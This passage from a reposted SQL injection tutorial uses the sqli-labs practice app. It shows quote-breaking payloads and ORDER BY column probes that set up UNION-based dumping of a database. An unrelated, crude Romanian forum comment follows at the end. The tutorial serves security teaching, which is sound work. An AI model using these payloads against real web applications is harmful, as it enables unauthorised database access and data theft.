TABLE_NAME WHERE ID=' 1'
# ' LIMIT 0,1 The complete URL with the injection is: http://localhost/sqli-labs/Less-1/?id=1'--+ http://localhost/sqli-labs/Less-1/?id=1' %23 (NOTE: %23 is the URL-encoded value for #) For Lesson 2, we do not need any extra quote to escape and inject queries, as there are no quotes in the first place; therefore simply commenting out should be fine. http://localhost/sqli-labs/Less-2/?id=1--+ http://localhost/sqli-labs/Less-2/?id=1 %23 (NOTE: %23 is the URL-encoded value for #) So the query effectively becomes SELECT * FROM TABLE_NAME WHERE ID= 1--+ LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID= 1 # LIMIT 0,1 Let us now look at Less-3 and Less-4. The query for Less-3 that we deduced earlier was: SELECT * FROM TABLE_NAME WHERE ID=('$ID') LIMIT 0,1 Therefore, to get a working query in this case, we need to first inject ') as discussed above to close the initial delimiter and then comment out the rest of the query. SELECT * FROM TABLE_NAME WHERE ID=(' 1') --+ ') LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID=(' 1') # ') LIMIT 0,1 The query for Less-4 that we deduced earlier was: SELECT * FROM TABLE_NAME WHERE ID=("$ID") LIMIT 0,1 Therefore, to get a working query in this case, we need to first inject ") as discussed above to close the initial delimiter and then comment out the rest of the query. SELECT * FROM TABLE_NAME WHERE ID=(" 1") --+ ") LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID=(" 1") # ") LIMIT 0,1 Injection: 1') --+ Injection: 1') %23 (NOTE: %23 is the URL-encoded value for #) Injection: 1") --+ Injection: 1") %23 (NOTE: %23 is the URL-encoded value for #) Once we are in this position, having fixed the query after a successful injection, we can inject code between the delimiter and the comment we injected. FINDING THE COLUMNS USED BY THE DEVELOPER IN QUERIES As we saw during the enumeration phase, the application interacts with the database and displays some info on the web pages. Therefore we will be using UNION statements to dump the database info.
A constraint on the use of UNION statements is that the number of columns on both sides of the UNION must be the same; therefore our last hurdle before we get something out of the database is to learn the number of columns used by the developer in his query. To do this we use the SQL keyword ORDER BY. When we use ORDER BY in a query, the result set is arranged according to the ORDER BY clause; if the referenced column position does not exist, we get an error. Therefore in our injections we add ORDER BY 1, ORDER BY 2, ORDER BY 3, … and observe the result. Injection: 1' ORDER BY 1 --+ => No error. Injection: 1' ORDER BY 2 --+ => No error. Injection: 1' ORDER BY 3 --+ => No error. Injection: 1' ORDER BY 4 --+ => Error – Unknown column '4' in 'order clause', indicating we have 3 columns. For Lesson 2: Injection: 1 ORDER BY 1 --+ => No error. Injection: 1 ORDER BY 2 --+ => No error. Injection: 1 ORDER BY 3 --+ => No error. Injection: 1 ORDER BY 4 --+ => Error – Unknown column '4' in 'order clause', indicating we have 3 columns. For Lesson 3: Injection: 1') ORDER BY 1 --+ => No error. Injection: 1') ORDER BY 2 --+ => No error. Injection: 1') ORDER BY 3 --+ => No error. Injection: 1') ORDER BY 4 --+ => Error – Unknown column '4' in 'order clause', indicating we have 3 columns. For Lesson 4: Injection: 1") ORDER BY 1 --+ => No error. Injection: 1") ORDER BY 2 --+ => No error. Injection: 1") ORDER BY 3 --+ => No error. Injection: 1") ORDER BY 4 --+ => Error – Unknown column '4' in 'order clause', indicating we have 3 columns. Once we know the number of columns in the query, we can go ahead and dump the databases and data of our choice. We will continue in the next part of this series. You can also refer to the video postings about the same topic from the following link: Sursa: InfoSec Institute Resources – SQL Injections: An Introduction
Sfinte cacat Cum sa faci un program ca asta: 1. Google 2. Surse Bisual Basic 6 3. Copy/Paste in VB6 4. Cateva butoane 5. Gata multi-shit Hy -1 - 0 RST